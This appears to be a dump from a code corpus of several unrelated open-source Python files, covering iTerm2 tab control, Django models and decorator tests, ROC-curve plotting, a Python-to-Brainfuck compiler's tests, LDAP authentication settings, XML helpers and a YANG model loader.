result = await iterm2.rpc.async_variable(self.connection, gets=[name], tab_id=self.__tab_id)
status = result.variable_response.status
if status != iterm2.api_pb2.VariableResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.VariableResponse.Status.Name(status))
else:
return json.loads(result.variable_response.values[0])
async def async_close(self, force: bool=False) -> None:
"""
Closes the tab.
:param force: If True, the user will not be prompted for a confirmation.
:throws: :class:`RPCException` if something goes wrong.
.. seealso:: Example ":ref:`close_to_the_right_example`"
"""
result = await iterm2.rpc.async_close(self.connection, tabs=[self.__tab_id], force=force)
status = result.close_response.statuses[0]
if status != iterm2.api_pb2.CloseResponse.Status.Value("OK"):
raise iterm2.rpc.RPCException(iterm2.api_pb2.CloseResponse.Status.Name(status))
async def async_set_title(self, title: str):
"""Changes the tab's title.
This is equivalent to editing the tab's title with the menu item Edit Tab Title. The title is an interpolated string.
:param title: The new title. Set it to an empty string to use the default value (the current session's title).
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
invocation = iterm2.util.invocation_string(
"iterm2.set_title",
{ "title": title })
await iterm2.rpc.async_invoke_method(self.connection, self.tab_id, invocation, -1)
async def async_invoke_function(self, invocation: str, timeout: float=-1):
"""
Invoke an RPC. Could be a registered function by this or another script of a built-in function.
This invokes the RPC in the context of this tab. Note that most user-defined RPCs expect to be invoked in the context of a session. Default variables will be pulled from that scope. If you call a function from the wrong context it may fail because its defaults will not be set properly.
:param invocation: A function invocation string.
        :param timeout: Max number of seconds to wait. Negative values mean to use the system default timeout.
:returns: The result of the invocation if successful.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
response = await iterm2.rpc.async_invoke_function(
self.connection,
invocation,
tab_id=self.tab_id,
timeout=timeout)
which = response.invoke_function_response.WhichOneof('disposition')
if which == 'error':
if response.invoke_function_response.error.status == iterm2.api_pb2.InvokeFunctionResponse.Status.Value("TIMEOUT"):
raise iterm2.rpc.RPCException("Timeout")
else:
raise iterm2.rpc.RPCException("{}: {}".format(
iterm2.api_pb2.InvokeFunctionResponse.Status.Name(
response.invoke_function_response.error.status),
response.invoke_function_response.error.error_reason))
return json.loads(response.invoke_function_response.success.json_result)
async def async_move_to_window(self) -> 'iterm2.window.Window':
"""
Moves this tab to its own window, provided there are multiple tabs in the window it belongs to.
:returns: The new window ID.
:throws: :class:`~iterm2.rpc.RPCException` if something goes wrong.
"""
window_id = await self.async_invoke_function("iterm2.move_tab_to_window()")
app = await iterm2.app.async_get_app(self.connection)
assert(app)
window = app.get_window_by_id(window_id)
if not window:
raise iterm2.rpc.RPCException("No such window {}".format(window_id))
return window
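

# Illustrative sketch only, not part of this module's API and never invoked here:
# a coroutine showing typical use of the Tab class above. It assumes an
# established connection, the iterm2.app.async_get_app() helper already used in
# this file, and the App.current_terminal_window / Window.current_tab properties
# of the public iterm2 classes; the "user.project" variable name is invented for
# the example.
async def _example_tab_usage(connection):
    """Hypothetical helper: activate the current tab and round-trip a user variable."""
    app = await iterm2.app.async_get_app(connection)
    tab = app.current_terminal_window.current_tab
    await tab.async_activate()
    await tab.async_set_variable("user.project", "demo")
    return await tab.async_get_variable("user.project")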
| gpl-2.0 | -8,314,729,409,645,964,000 | 38.377698 | 294 | 0.636065 | false |
OpenTTD-Ladder/ladder-web | ladder/frontpage/models.py | 1 | 1035 | from django.conf import settings
from django.db import models
from django.utils import timezone
from translations.models import Translatable, Translation
try:
from ckeditor.fields import RichTextField
except ImportError:
RichTextField = models.TextField
class News(Translatable):
author = models.ForeignKey(settings.AUTH_USER_MODEL, related_name = "news_authored")
authored = models.DateTimeField(default = timezone.now)
background = models.ImageField(upload_to = "images", blank = True, null = True)
class Meta:
verbose_name = "News Item"
verbose_name_plural = "News Items"
class NewsTranslation(Translation):
news = models.ForeignKey(News, related_name='translations')
title = models.CharField(max_length = 64)
intro = RichTextField()
continued = RichTextField()
def __unicode__(self):
return self.title
class Meta:
verbose_name = "Translation"
verbose_name_plural = "Translations" | gpl-2.0 | -3,211,320,791,145,666,600 | 32.419355 | 97 | 0.674396 | false |
ntamas/yard | yard/scripts/plot.py | 1 | 9037 | """Standalone command-line application that plots ROC, precision-recall
and accumulation curves."""
import sys
from itertools import cycle
from yard.data import BinaryClassifierData
from yard.curve import CurveFactory
from yard.scripts import CommandLineAppForClassifierData
from yard.utils import parse_size
__author__ = "Tamas Nepusz"
__email__ = "[email protected]"
__copyright__ = "Copyright (c) 2010, Tamas Nepusz"
__license__ = "MIT"
class ROCPlotterApplication(CommandLineAppForClassifierData):
"""\
%prog input_file
Standalone command-line application that plots ROC, precision-recall
and accumulation curves.
The input file must contain one observation per line, the first column
being the expected class (1 for positive examples, -1 for negatives),
the second being the prediction itself. You can also use the -c switch
to use different column indices and multiple datasets. Columns are
    separated by whitespace by default.\
"""
short_name = "yard-plot"
def __init__(self):
super(ROCPlotterApplication, self).__init__()
def add_parser_options(self):
"""Creates the command line parser object for the application"""
super(ROCPlotterApplication, self).add_parser_options()
parser = self.parser
parser.add_option(
"-t",
"--curve-type",
dest="curve_types",
metavar="TYPE",
choices=CurveFactory.get_curve_names(),
action="append",
default=[],
help="sets the TYPE of the curve to be plotted "
"(roc, pr, ac, sespe or croc). May be specified "
"multiple times.",
)
parser.add_option(
"-l",
"--log-scale",
dest="log_scale",
metavar="AXES",
help="use logarithmic scale on the given AXES. "
"Valid values: none, x, y and xy",
choices=["none", "x", "y", "xy"],
default="none",
)
parser.add_option(
"-o",
"--output",
dest="output",
metavar="FILE",
help="saves the plot to the given FILE instead of showing it",
default=None,
)
parser.add_option(
"-s",
"--size",
dest="size",
metavar="WIDTHxHEIGHT",
help="sets the size of the figure to WIDTHxHEIGHT, where "
"WIDTH and HEIGHT are measures in inches. You may "
"specify alternative measures (cm or mm) by adding "
'them as a suffix; e.g., "6cmx4cm" or "6cm x 4cm"',
default=None,
)
parser.add_option(
"--dpi",
dest="dpi",
metavar="DPI",
type=float,
default=72.0,
help="specifies the dpi value (dots per inch) when "
"converting pixels to inches and vice versa "
"in figure and font size calculations. "
"Default: %default",
)
parser.add_option(
"--font-size",
dest="font_size",
metavar="SIZE",
type=float,
default=None,
help="overrides the font size to be used on figures, " "in points (pt).",
)
parser.add_option(
"--show-auc",
dest="show_auc",
action="store_true",
default=False,
help="shows the AUC scores in the legend",
)
parser.add_option(
"--no-resampling",
dest="resampling",
action="store_false",
default=True,
help="don't resample curves before " "plotting and AUC calculation",
)
def run_real(self):
"""Runs the main application"""
import matplotlib
# Do we need headless mode for matplotlib?
if self.options.output:
matplotlib.use("agg")
# If no curve type was given, assume a ROC curve
if not self.options.curve_types:
self.options.curve_types = ["roc"]
# Set up the font size
if self.options.font_size is not None:
for param in ["font.size", "legend.fontsize"]:
matplotlib.rcParams[param] = self.options.font_size
# Get the types of the curves to be plotted
curve_classes = []
for name in self.options.curve_types:
try:
curve_classes.append(CurveFactory.find_class_by_name(name))
except ValueError:
self.parser.error("Unknown curve type: %s" % name)
# Do we have multiple curve types? If so, we need PDF output
pp = None
if len(curve_classes) > 1:
if not self.options.output or not self.options.output.endswith(".pdf"):
self.parser.error("multiple curves can only be plotted to PDF")
try:
from matplotlib.backends.backend_pdf import PdfPages
except ImportError:
self.parser.error(
"Matplotlib is too old and does not have "
"multi-page PDF support yet. Please upgrade it to "
"Matplotlib 0.99 or later"
)
pp = PdfPages(self.options.output)
def figure_saver(figure):
pp.savefig(figure, bbox_inches="tight")
elif self.options.output:
# Figure with a single plot will be created
def figure_saver(figure):
self.log.info("Saving plot to %s..." % self.options.output)
figure.savefig(self.options.output, bbox_inches="tight")
else:
# Figure will be shown on screen
def figure_saver(figure):
import matplotlib.pyplot as plt
plt.show()
self.process_input_files()
self.log.info("Plotting results...")
for curve_class in curve_classes:
fig = self.get_figure_for_curves(curve_class)
figure_saver(fig)
# For multi-page output, we have to close it explicitly
if pp is not None:
pp.close()
def get_figure_for_curves(self, curve_class):
"""Plots curves given by `curve_class` for all the data in `self.data`.
`curve_class` is a subclass of `BinaryClassifierPerformanceCurve`.
`self.data` must be a dict of lists, and the ``__class__`` key of
`self.data` must map to the expected classes of elements. Returns an
instance of `matplotlib.figure.Figure`."""
fig, axes = None, None
data = self.data
expected = data["__class__"]
keys = sorted(data.keys())
keys.remove("__class__")
styles = [
"r-",
"b-",
"g-",
"c-",
"m-",
"y-",
"k-",
"r--",
"b--",
"g--",
"c--",
"m--",
"y--",
"k--",
]
# Plot the curves
line_handles, labels, aucs = [], [], []
for key, style in zip(keys, cycle(styles)):
self.log.info(
"Calculating %s for %s..." % (curve_class.get_friendly_name(), key)
)
observed = data[key]
bc_data = BinaryClassifierData(zip(observed, expected), title=key)
curve = curve_class(bc_data)
if self.options.resampling:
curve.resample(x / 2000.0 for x in range(2001))
if self.options.show_auc:
aucs.append(curve.auc())
labels.append("%s, AUC=%.4f" % (key, aucs[-1]))
else:
labels.append(key)
if not fig:
dpi = self.options.dpi
fig = curve.get_empty_figure(
dpi=dpi, figsize=parse_size(self.options.size, dpi=dpi)
)
axes = fig.get_axes()[0]
line_handle = curve.plot_on_axes(axes, style=style, legend=False)
line_handles.append(line_handle)
if aucs:
# Sort the labels of the legend in decreasing order of AUC
indices = sorted(range(len(aucs)), key=aucs.__getitem__, reverse=True)
line_handles = [line_handles[i] for i in indices]
labels = [labels[i] for i in indices]
aucs = [aucs[i] for i in indices]
if axes:
legend_pos = "best"
# Set logarithmic axes if needed
if "x" in self.options.log_scale:
axes.set_xscale("log")
legend_pos = "upper left"
if "y" in self.options.log_scale:
axes.set_yscale("log")
# Plot the legend
axes.legend(line_handles, labels, loc=legend_pos)
return fig
def main():
"""Entry point for the plotter script"""
sys.exit(ROCPlotterApplication().run())
if __name__ == "__main__":
main()
| mit | -2,838,634,514,883,085,300 | 31.507194 | 85 | 0.531592 | false |
vegitron/python2brainfuck | t/py2b/if_statements.py | 1 | 4029 | import unittest
from p2bf.builder import BFBuild
from p2bf.emitter import Emitter
import StringIO
from util.run_bf import run
class TestIfStatements(unittest.TestCase):
def test_if_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if True:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_if_false(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if False:\n print "BAD" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "")
def test_other_var_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """foo = 'A'\nif foo:\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_plain_string_true(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = """if 'A':\n print "OK" """
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "OK\n")
def test_if_else_match_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if 'A':\n print 'IF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "IF\n")
def test_if_else_match_else(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELSE\n")
def test_if_elif_else_match_if(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if 'A':\n print 'IF'\n"
"elif 'B':\n print 'ELIF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "IF\n")
def test_if_elif_else_match_elif(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"elif 'B':\n print 'ELIF'\n"
"else:\n print 'ELSE'\n")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELIF\n")
def test_if_elif_else_match_else(self):
emit_output = StringIO.StringIO()
run_output = StringIO.StringIO()
emitter = Emitter(stdout=emit_output)
python = ("if False:\n print 'IF'\n"
"elif False:\n print 'ELIF 2'\n"
"else:\n print 'ELSE'")
builder = BFBuild(python, emit=emitter).emit_bf()
run(emit_output.getvalue(), stdout=run_output)
self.assertEqual(run_output.getvalue(), "ELSE\n")
| apache-2.0 | -2,884,884,697,422,707,000 | 40.96875 | 58 | 0.590966 | false |
kingsdigitallab/kdl-django | ddhldap/settings.py | 1 | 1609 | # -----------------------------------------------------------------------------
# http://pythonhosted.org/django-auth-ldap/
# -----------------------------------------------------------------------------
from django_auth_ldap.config import LDAPSearch, PosixGroupType
import ldap
LDAP_BASE_DC = 'dc=dighum,dc=kcl,dc=ac,dc=uk'
LDAP_BASE_OU = 'ou=groups,' + LDAP_BASE_DC
# Baseline configuration
AUTH_LDAP_SERVER_URI = 'ldap://ldap1.cch.kcl.ac.uk'
AUTH_LDAP_BIND_DN = ''
AUTH_LDAP_BIND_PASSWORD = ''
AUTH_LDAP_USER_DN_TEMPLATE = 'uid=%(user)s,ou=people,' + LDAP_BASE_DC
# Set up the basic group parameters
AUTH_LDAP_GROUP_SEARCH = LDAPSearch(
LDAP_BASE_OU,
ldap.SCOPE_SUBTREE,
'(objectClass=posixGroup)'
)
AUTH_LDAP_GROUP_TYPE = PosixGroupType(name_attr='cn')
# Simple group restrictions
# TODO: Set this value in the project settings
AUTH_LDAP_REQUIRE_GROUP = ''
# Populate the Django user from the LDAP directory
AUTH_LDAP_USER_ATTR_MAP = {
'first_name': 'givenName',
'last_name': 'sn',
'email': 'mail'
}
AUTH_LDAP_USER_FLAGS_BY_GROUP = {
'is_active': 'cn=confluence-users,' + LDAP_BASE_OU,
'is_staff': 'cn=kdl-staff,' + LDAP_BASE_OU,
'is_superuser': 'cn=sysadmin,' + LDAP_BASE_OU
}
AUTH_LDAP_PROFILE_FLAGS_BY_GROUP = {}
# This is the default, but I like to be explicit
AUTH_LDAP_ALWAYS_UPDATE_USER = True
# Cache group memberships for an hour to minimize LDAP traffic
AUTH_LDAP_CACHE_GROUPS = True
AUTH_LDAP_GROUP_CACHE_TIMEOUT = 60 * 60
AUTHENTICATION_BACKENDS = (
'django_auth_ldap.backend.LDAPBackend',
'django.contrib.auth.backends.ModelBackend',
)
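
# Sketch of how a project's settings module might consume these defaults; the
# group DN below is an assumption for illustration, not a value shipped with
# this app:
#
#     from ddhldap.settings import *  # noqa
#     AUTH_LDAP_REQUIRE_GROUP = 'cn=kdl-staff,' + LDAP_BASE_OU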
| mit | 6,093,891,807,804,528,000 | 28.254545 | 79 | 0.632691 | false |
georgemarshall/django | tests/decorators/tests.py | 13 | 14939 | from functools import update_wrapper, wraps
from unittest import TestCase
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.decorators import (
login_required, permission_required, user_passes_test,
)
from django.http import HttpRequest, HttpResponse, HttpResponseNotAllowed
from django.middleware.clickjacking import XFrameOptionsMiddleware
from django.test import SimpleTestCase
from django.utils.decorators import method_decorator
from django.utils.functional import keep_lazy, keep_lazy_text, lazy
from django.utils.safestring import mark_safe
from django.views.decorators.cache import (
cache_control, cache_page, never_cache,
)
from django.views.decorators.clickjacking import (
xframe_options_deny, xframe_options_exempt, xframe_options_sameorigin,
)
from django.views.decorators.http import (
condition, require_GET, require_http_methods, require_POST, require_safe,
)
from django.views.decorators.vary import vary_on_cookie, vary_on_headers
def fully_decorated(request):
"""Expected __doc__"""
return HttpResponse('<html><body>dummy</body></html>')
fully_decorated.anything = "Expected __dict__"
def compose(*functions):
# compose(f, g)(*args, **kwargs) == f(g(*args, **kwargs))
functions = list(reversed(functions))
def _inner(*args, **kwargs):
result = functions[0](*args, **kwargs)
for f in functions[1:]:
result = f(result)
return result
return _inner
full_decorator = compose(
# django.views.decorators.http
require_http_methods(["GET"]),
require_GET,
require_POST,
require_safe,
condition(lambda r: None, lambda r: None),
# django.views.decorators.vary
vary_on_headers('Accept-language'),
vary_on_cookie,
# django.views.decorators.cache
cache_page(60 * 15),
cache_control(private=True),
never_cache,
# django.contrib.auth.decorators
# Apply user_passes_test twice to check #9474
user_passes_test(lambda u: True),
login_required,
permission_required('change_world'),
# django.contrib.admin.views.decorators
staff_member_required,
# django.utils.functional
keep_lazy(HttpResponse),
keep_lazy_text,
lazy,
# django.utils.safestring
mark_safe,
)
fully_decorated = full_decorator(fully_decorated)
class DecoratorsTest(TestCase):
def test_attributes(self):
"""
Built-in decorators set certain attributes of the wrapped function.
"""
self.assertEqual(fully_decorated.__name__, 'fully_decorated')
self.assertEqual(fully_decorated.__doc__, 'Expected __doc__')
self.assertEqual(fully_decorated.__dict__['anything'], 'Expected __dict__')
def test_user_passes_test_composition(self):
"""
The user_passes_test decorator can be applied multiple times (#9474).
"""
def test1(user):
user.decorators_applied.append('test1')
return True
def test2(user):
user.decorators_applied.append('test2')
return True
def callback(request):
return request.user.decorators_applied
callback = user_passes_test(test1)(callback)
callback = user_passes_test(test2)(callback)
class DummyUser:
pass
class DummyRequest:
pass
request = DummyRequest()
request.user = DummyUser()
request.user.decorators_applied = []
response = callback(request)
self.assertEqual(response, ['test2', 'test1'])
def test_cache_page(self):
def my_view(request):
return "response"
my_view_cached = cache_page(123)(my_view)
self.assertEqual(my_view_cached(HttpRequest()), "response")
my_view_cached2 = cache_page(123, key_prefix="test")(my_view)
self.assertEqual(my_view_cached2(HttpRequest()), "response")
def test_require_safe_accepts_only_safe_methods(self):
"""
Test for the require_safe decorator.
A view returns either a response or an exception.
Refs #15637.
"""
def my_view(request):
return HttpResponse("OK")
my_safe_view = require_safe(my_view)
request = HttpRequest()
request.method = 'GET'
self.assertIsInstance(my_safe_view(request), HttpResponse)
request.method = 'HEAD'
self.assertIsInstance(my_safe_view(request), HttpResponse)
request.method = 'POST'
self.assertIsInstance(my_safe_view(request), HttpResponseNotAllowed)
request.method = 'PUT'
self.assertIsInstance(my_safe_view(request), HttpResponseNotAllowed)
request.method = 'DELETE'
self.assertIsInstance(my_safe_view(request), HttpResponseNotAllowed)
# For testing method_decorator, a decorator that assumes a single argument.
# We will get a TypeError if there is a mismatch in the number of arguments.
def simple_dec(func):
def wrapper(arg):
return func("test:" + arg)
return wraps(func)(wrapper)
simple_dec_m = method_decorator(simple_dec)
# For testing method_decorator, two decorators that add an attribute to the function
def myattr_dec(func):
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.myattr = True
return wrapper
myattr_dec_m = method_decorator(myattr_dec)
def myattr2_dec(func):
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
wrapper.myattr2 = True
return wrapper
myattr2_dec_m = method_decorator(myattr2_dec)
class ClsDec:
def __init__(self, myattr):
self.myattr = myattr
def __call__(self, f):
def wrapped():
return f() and self.myattr
return update_wrapper(wrapped, f)
class MethodDecoratorTests(SimpleTestCase):
"""
Tests for method_decorator
"""
def test_preserve_signature(self):
class Test:
@simple_dec_m
def say(self, arg):
return arg
self.assertEqual("test:hello", Test().say("hello"))
def test_preserve_attributes(self):
# Sanity check myattr_dec and myattr2_dec
@myattr_dec
def func():
pass
self.assertIs(getattr(func, 'myattr', False), True)
@myattr2_dec
def func():
pass
self.assertIs(getattr(func, 'myattr2', False), True)
@myattr_dec
@myattr2_dec
def func():
pass
self.assertIs(getattr(func, 'myattr', False), True)
self.assertIs(getattr(func, 'myattr2', False), False)
# Decorate using method_decorator() on the method.
class TestPlain:
@myattr_dec_m
@myattr2_dec_m
def method(self):
"A method"
pass
# Decorate using method_decorator() on both the class and the method.
# The decorators applied to the methods are applied before the ones
# applied to the class.
@method_decorator(myattr_dec_m, "method")
class TestMethodAndClass:
@method_decorator(myattr2_dec_m)
def method(self):
"A method"
pass
# Decorate using an iterable of function decorators.
@method_decorator((myattr_dec, myattr2_dec), 'method')
class TestFunctionIterable:
def method(self):
"A method"
pass
# Decorate using an iterable of method decorators.
decorators = (myattr_dec_m, myattr2_dec_m)
@method_decorator(decorators, "method")
class TestMethodIterable:
def method(self):
"A method"
pass
tests = (TestPlain, TestMethodAndClass, TestFunctionIterable, TestMethodIterable)
for Test in tests:
with self.subTest(Test=Test):
self.assertIs(getattr(Test().method, 'myattr', False), True)
self.assertIs(getattr(Test().method, 'myattr2', False), True)
self.assertIs(getattr(Test.method, 'myattr', False), True)
self.assertIs(getattr(Test.method, 'myattr2', False), True)
self.assertEqual(Test.method.__doc__, 'A method')
self.assertEqual(Test.method.__name__, 'method')
def test_new_attribute(self):
"""A decorator that sets a new attribute on the method."""
def decorate(func):
func.x = 1
return func
class MyClass:
@method_decorator(decorate)
def method(self):
return True
obj = MyClass()
self.assertEqual(obj.method.x, 1)
self.assertIs(obj.method(), True)
def test_bad_iterable(self):
decorators = {myattr_dec_m, myattr2_dec_m}
msg = "'set' object is not subscriptable"
with self.assertRaisesMessage(TypeError, msg):
@method_decorator(decorators, "method")
class TestIterable:
def method(self):
"A method"
pass
# Test for argumented decorator
def test_argumented(self):
class Test:
@method_decorator(ClsDec(False))
def method(self):
return True
self.assertIs(Test().method(), False)
def test_descriptors(self):
def original_dec(wrapped):
def _wrapped(arg):
return wrapped(arg)
return _wrapped
method_dec = method_decorator(original_dec)
class bound_wrapper:
def __init__(self, wrapped):
self.wrapped = wrapped
self.__name__ = wrapped.__name__
def __call__(self, arg):
return self.wrapped(arg)
def __get__(self, instance, cls=None):
return self
class descriptor_wrapper:
def __init__(self, wrapped):
self.wrapped = wrapped
self.__name__ = wrapped.__name__
def __get__(self, instance, cls=None):
return bound_wrapper(self.wrapped.__get__(instance, cls))
class Test:
@method_dec
@descriptor_wrapper
def method(self, arg):
return arg
self.assertEqual(Test().method(1), 1)
def test_class_decoration(self):
"""
@method_decorator can be used to decorate a class and its methods.
"""
def deco(func):
def _wrapper(*args, **kwargs):
return True
return _wrapper
@method_decorator(deco, name="method")
class Test:
def method(self):
return False
self.assertTrue(Test().method())
def test_tuple_of_decorators(self):
"""
@method_decorator can accept a tuple of decorators.
"""
def add_question_mark(func):
def _wrapper(*args, **kwargs):
return func(*args, **kwargs) + "?"
return _wrapper
def add_exclamation_mark(func):
def _wrapper(*args, **kwargs):
return func(*args, **kwargs) + "!"
return _wrapper
# The order should be consistent with the usual order in which
# decorators are applied, e.g.
# @add_exclamation_mark
# @add_question_mark
# def func():
# ...
decorators = (add_exclamation_mark, add_question_mark)
@method_decorator(decorators, name="method")
class TestFirst:
def method(self):
return "hello world"
class TestSecond:
@method_decorator(decorators)
def method(self):
return "hello world"
self.assertEqual(TestFirst().method(), "hello world?!")
self.assertEqual(TestSecond().method(), "hello world?!")
def test_invalid_non_callable_attribute_decoration(self):
"""
@method_decorator on a non-callable attribute raises an error.
"""
msg = (
"Cannot decorate 'prop' as it isn't a callable attribute of "
"<class 'Test'> (1)"
)
with self.assertRaisesMessage(TypeError, msg):
@method_decorator(lambda: None, name="prop")
class Test:
prop = 1
@classmethod
def __module__(cls):
return "tests"
def test_invalid_method_name_to_decorate(self):
"""
@method_decorator on a nonexistent method raises an error.
"""
msg = (
"The keyword argument `name` must be the name of a method of the "
"decorated class: <class 'Test'>. Got 'nonexistent_method' instead"
)
with self.assertRaisesMessage(ValueError, msg):
@method_decorator(lambda: None, name='nonexistent_method')
class Test:
@classmethod
def __module__(cls):
return "tests"
class XFrameOptionsDecoratorsTests(TestCase):
"""
Tests for the X-Frame-Options decorators.
"""
def test_deny_decorator(self):
"""
Ensures @xframe_options_deny properly sets the X-Frame-Options header.
"""
@xframe_options_deny
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(r['X-Frame-Options'], 'DENY')
def test_sameorigin_decorator(self):
"""
Ensures @xframe_options_sameorigin properly sets the X-Frame-Options
header.
"""
@xframe_options_sameorigin
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(r['X-Frame-Options'], 'SAMEORIGIN')
def test_exempt_decorator(self):
"""
Ensures @xframe_options_exempt properly instructs the
XFrameOptionsMiddleware to NOT set the header.
"""
@xframe_options_exempt
def a_view(request):
return HttpResponse()
req = HttpRequest()
resp = a_view(req)
self.assertIsNone(resp.get('X-Frame-Options', None))
self.assertTrue(resp.xframe_options_exempt)
# Since the real purpose of the exempt decorator is to suppress
# the middleware's functionality, let's make sure it actually works...
r = XFrameOptionsMiddleware().process_response(req, resp)
self.assertIsNone(r.get('X-Frame-Options', None))
class NeverCacheDecoratorTest(TestCase):
def test_never_cache_decorator(self):
@never_cache
def a_view(request):
return HttpResponse()
r = a_view(HttpRequest())
self.assertEqual(
set(r['Cache-Control'].split(', ')),
{'max-age=0', 'no-cache', 'no-store', 'must-revalidate', 'private'},
)
| bsd-3-clause | -4,067,068,310,913,353,700 | 29.993776 | 89 | 0.592141 | false |
jperla/webify | webify/templates/helpers/xml.py | 1 | 1061 |
__no_content = object()
def node(element_name, content=__no_content, attributes={}):
attrs_string = _attrs_string(attributes)
    if content is __no_content:
return node_block(element_name, attributes)
else:
return node_inline(element_name, content, attributes)
def _attrs_string(attributes):
attrs = u' '.join(['%s="%s"' % (k,v) for k,v in attributes.iteritems()])
attrs_string = (u' ' + attrs) if len(attrs) > 0 else u''
return attrs_string
def node_inline(element_name, content, attributes={}):
attrs_string = _attrs_string(attributes)
if content == u'':
return u'<%s%s />' % (element_name, attrs_string)
else:
return u'<%s%s>%s</%s>\n' % (element_name, attrs_string, content, element_name)
def node_block(element_name, attributes={}):
attrs_string = _attrs_string(attributes)
return u'<%s%s>\n' % (element_name, attrs_string), u'</%s>\n' % element_name
def cdata(content):
    return u'<![CDATA[%s\n]]>' % content
def cdata_block():
    return u'<![CDATA[', u'\n]]>'
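# Illustrative usage (not part of the original module; shown for clarity only):
#
#   node(u'a', u'home', {'href': u'/'})  -> u'<a href="/">home</a>\n'
#   node_block(u'channel')               -> (u'<channel>\n', u'</channel>\n')
#   cdata(u'raw text')                   -> u'<![CDATA[raw text\n]]>'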
| mit | -1,484,670,680,213,760,300 | 33.225806 | 87 | 0.613572 | false |
cboling/onos-restconf-providers | tools/mockDevice/yangModel.py | 1 | 5799 | #
# Copyright 2015-present Boling Consulting Solutions, bcsw.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from yinFile import YINFile
import os
class YangModel:
"""
This class wraps the yang model and helps to hide some of the ugly details needed to
get this code-generated RESTCONF server working.
"""
_extmethods = None
_yang_class = None
_yin = None
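    # A minimal usage sketch (illustrative only; the paths and file names below
    # are assumptions, not part of this module):
    #
    #   model = YangModel('/path/to/yin', 'example-module.yin', 'models', verbose=1)
    #   print model.name          # e.g. 'example-module'
    #   print model.package_name  # e.g. 'example_module'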
def __init__(self, yin_path, yin_file, model_dir, verbose=False):
"""
YANG model initializer
:param: yin_path (string) Directory path to the location of the YIN file (and python file)
:param: yin_file (string) Name of the YIN file generated by 'pyang'. The name of the code-generated
python file is extracted from the YIN file (module name).
:param: model_dir (string) Directory name of where the model is.
Used in constructing the import statement.
:param: verbose (integer) Flag indicating if verbose output is to be presented
"""
self._yin = YINFile(os.path.join(yin_path, yin_file), verbose)
self._verbose = verbose
# Import the model
self._import_models(model_dir)
def __str__(self):
return 'YangModel: %s' % self.name
@property
def name(self):
"""
Get the module name.
@:returns: (string) YANG Model name
"""
return self._yin.module_name
@property
def package_name(self):
"""
        Get the code-generated package name. The pyangbind package will replace hyphens and
spaces with underscores.
@:returns: (string) Python code-generated module name
"""
return self.name.replace('-', '_').replace(' ', '_')
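    # For example (illustrative): a module named 'example yang-module' maps to
    # the code-generated package name 'example_yang_module'.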
def _import_models(self, model_dir):
"""
This method is responsible for accessing the code-generated class and building up
a model that can be used to provide a simple RESTCONF server implementation of the
model.
:param: model_dir (string) Base directory name of where the model is.
"""
package = model_dir
module = self.package_name
_class = self.package_name
try:
if self._verbose > 0:
print 'Dynamic import -> from %s.%s import %s' % (package, module, _class)
yang_module = __import__('%s.%s' % (package, module), fromlist=[_class])
yang_class = getattr(yang_module, _class)
if self._verbose > 0:
print 'YANG class initially imported: %s' % yang_class
# Construct the extmethods for all appropriate nodes in the class and then
            # reconstruct the class if needed with these methods
self._extmethods = self._yin.get_extmethods(yang_class().get())
# Now reconstruct the class and pass in these methods
if self._extmethods is not None and len(self._extmethods) > 0:
self._yang_class = getattr(yang_module, _class)(extmethods=self._extmethods)
else:
self._yang_class = yang_class
except ImportError:
print 'Import Error while attempting to import class %s from %s.%s' % (_class, package, module)
    # Instantiate the model the first time so we can generate all the paths
    # within it, which lets us create the extension methods that provide the
    # RESTCONF-required operations
###########################################################################
def _get_extmethods(self, element, path_base=''):
"""
        A recursive function to convert a YANG model into an extmethods dictionary
